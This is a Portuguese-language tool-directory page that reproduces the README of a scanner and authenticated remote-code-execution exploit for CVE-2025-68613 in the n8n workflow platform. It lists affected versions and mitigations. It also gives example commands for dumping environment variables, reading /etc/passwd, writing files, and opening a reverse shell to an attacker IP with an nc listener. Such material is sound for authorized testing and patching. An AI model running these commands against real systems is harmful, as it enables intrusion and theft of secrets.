Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
n8n-cve-2025-68613 — Exploit PoC de RCE autenticado e scanner de vulnerabilidades para CVE-2025-68613 no n8n. Suporta execução de comandos, operações de arquivos e payloads de reverse shell para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/gagaltotal/n8n-cve-2025-68613
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHub
gagaltotal/n8n-cve-2025-68613

n8n-cve-2025-68613

Exploit PoC de RCE autenticado e scanner de vulnerabilidades para CVE-2025-68613 no n8n. Suporta execução de comandos, operações de arquivos e payloads de reverse shell para testes de segurança autorizados.

Ver RepositórioSite
10há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-68613 – Injeção de Expressão RCE no n8n

Python Security CVE Status

Este kit fornece scanner e PoC de exploit para a vulnerabilidade crítica
CVE-2025-68613 na Plataforma de Automação de Fluxo de Trabalho n8n.

Este repositório fornece scripts de scanner e PoC de exploit para a vulnerabilidade crítica
CVE-2025-68613 que afeta a Plataforma de Automação de Fluxo de Trabalho n8n.


AVISO / ADVERTÊNCIA

Indonésio

Esta ferramenta é APENAS para testes de segurança AUTORIZADOS e LEGÍTIMOS.
É proibido usar esta ferramenta em sistemas sem permissão do proprietário.

Inglês

Esta ferramenta é APENAS para testes de segurança autorizados e legais. O uso não autorizado é ilegal e proibido.



Visão Geral da Vulnerabilidade

  • ID do CVE : CVE-2025-68613
  • Gravidade : Crítica
  • CVSS : 10.0
  • Tipo : Injeção de Expressão → Execução Remota de Código (RCE)
  • Produto : Plataforma de Automação de Fluxo de Trabalho n8n

Versões Vulneráveis

  • 0.211.0 – 1.120.3
  • 1.121.0

Versões Corrigidas

  • 1.120.4+
  • 1.121.1+
  • 1.122.0+

Estrutura do Repositório

root@kitploit:~
.
├── tot-scanner-2025-68613.py   # Vulnerability Scanner (NO exploit)
├── tot-exploit-2025-68613.py   # Authenticated RCE Exploit PoC
├── requirements.txt
└── README.md

Scanner (Não Exploit)

O scanner é usado para:

  • Detectar o serviço n8n
  • Extrair a versão do n8n
  • Determinar o status da vulnerabilidade
  • Não realiza exploração
  • Suporta saída JSON

O scanner:

  • Detecta o serviço n8n
  • Extrai a versão do n8n
  • Determina o status da vulnerabilidade
  • Sem exploração
  • Suporta saída JSON

O scanner verifica os seguintes endpoints:

  • /
  • /rest/settings
  • /healthz
  • /api/v1/health

Dependências / Requisitos

Indonésio

Pacotes necessários:

  • requests

Conteúdo do arquivo requirements.txt:

root@kitploit:~
requests>=2.28.0

Inglês

Pacotes necessários:

  • requests

Conteúdo do requirements.txt:

root@kitploit:~
requests>=2.28.0

Instalação

root@kitploit:~
pip install -r requirements.txt

Uso do Scanner

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678

Modo JSON do Scanner

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json

Exemplo de Saída JSON do Scanner

root@kitploit:~
{
  "target": "http://target.com:5678",
  "detected": true,
  "version": "1.121.0",
  "vulnerable": true,
  "status": "vulnerable",
  "cve": "CVE-2025-68613"
}

Códigos de Saída do Scanner

CódigoSignificado
0Não vulnerável
1Versão desconhecida
2Vulnerável

PoC de Exploit (RCE Autenticado)

Este exploit REQUER credenciais válidas do n8n
Acesso autenticado é OBRIGATÓRIO

O exploit funciona da seguinte forma:

  1. Fazer login no n8n
  2. Criar um workflow
  3. Inserir expressão maliciosa no nó Set
  4. Executar o workflow
  5. (Opcional) Limpeza do workflow

Argumentos do Exploit

ArgumentoObrigatórioDescrição
-u / --url✅URL alvo do n8n
-e / --email✅Email da conta n8n
-p / --password✅Senha da conta n8n
--payload✅Tipo de payload
--command❌Comando do SO (cmd)
--file❌Caminho do arquivo (read/write)
--content❌Conteúdo do arquivo (write)
--lhost❌IP do atacante (revshell)
--lport❌Porta do atacante (revshell)
--verify-ssl❌Verificar certificado SSL

Payloads Suportados

PayloadFunção
infoInformações do sistema
cmdExecução de comando
envDump de variáveis de ambiente
readLer arquivo
writeEscrever arquivo
revshellReverse shell

Screen Capture

Exemplos de Exploit

Informações do Sistema

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload info

Execução de Comando

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload cmd  --command "id"

Ler Arquivo

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload read  --file /etc/passwd

Escrever Arquivo

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload write  --file /tmp/pwned.txt  --content "owned"

Shell Reverso

root@kitploit:~
nc -lvnp 4444
root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload revshell  --lhost 10.10.14.5  --lport 4444

Mitigação

  • Atualize o n8n para versões corrigidas
  • Restrinja o acesso aos endpoints /rest/*
  • Imponha RBAC e autenticação forte
  • Audite workflows desconhecidos

Aviso Legal

Este projeto é fornecido apenas para fins educacionais e testes de segurança autorizados.
O autor não é responsável pelo uso indevido.


Tópicos do GitHub

root@kitploit:~
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python

Mantenha-se legal. Mantenha-se ético.

Baixar ferramenta